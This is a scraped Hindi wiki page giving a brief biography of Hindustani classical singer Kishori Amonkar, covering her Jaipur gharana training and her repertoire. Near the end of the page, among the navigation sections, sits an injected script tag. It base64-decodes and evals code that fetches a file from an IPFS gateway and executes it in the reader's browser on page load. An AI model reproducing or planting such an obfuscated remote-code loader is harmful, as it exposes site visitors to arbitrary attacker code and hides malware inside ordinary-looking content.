किशोरी अमोनकर

भारत डिस्कवरी प्रस्तुति
Revision as of 08:28, 13 March 2012 by गोविन्द राम (talk | contribs) (''''किशोरी अमोनकर''' (जन्म: 1932 महाराष्ट्र) हिंदुस्‍तानी ...' के साथ नया पन्ना बनाया)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

किशोरी अमोनकर (जन्म: 1932 महाराष्ट्र) हिंदुस्‍तानी शास्‍त्रीय परंपरा की प्रमुख गायिकाओं में से एक और जयपुर घराने की अग्रणी गायिका हैं। प्रसिद्ध गायिका मोघूबाई कुर्दीकर (जिन्‍होंने जयपुर घराने के वरिष्‍ठ गायन सम्राट उस्‍ताद अल्‍लादिया खां साहब से शिक्षा प्राप्‍त की) की बेटी किशोरी अमोनकर संगीत से ओतप्रोत वातावरण में पली-बढ़ी।

गायन प्रतिभा

किशोरी अमोनकर ने न केवल जयपुर घराने की गायकी की बारीकियों और तकनीकों पर अधिकार प्राप्‍त किया, बल्‍कि कलांतर में अपने कौशल और कल्‍पना से एक नवीन शैली भी विकसित की। इस प्रकार उनकी शैली में अन्‍य घरानों की बारीकियां भी झलकती हैं। अमोनकर की प्रस्‍तुतियां ऊर्जा और लावण्‍य से अनुप्राणित होती हैं। उन्‍होंने प्राचीन संगीत ग्रंथों पर विस्‍तृत शोध किया है और उन्‍हें संगीत की गहरी समझ है। उनका संगीत भंडार विशाल है और वह न केवल पारंपरिक रागों, जैसे जौनपुरी, पटट् बिहाग, अहीर और भैरव प्रस्‍तुत करती हैं, बल्‍कि ठुमरी, भजन और खयाल भी गाती हैं।

सम्मान और पुरस्कार


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ


संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>



वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः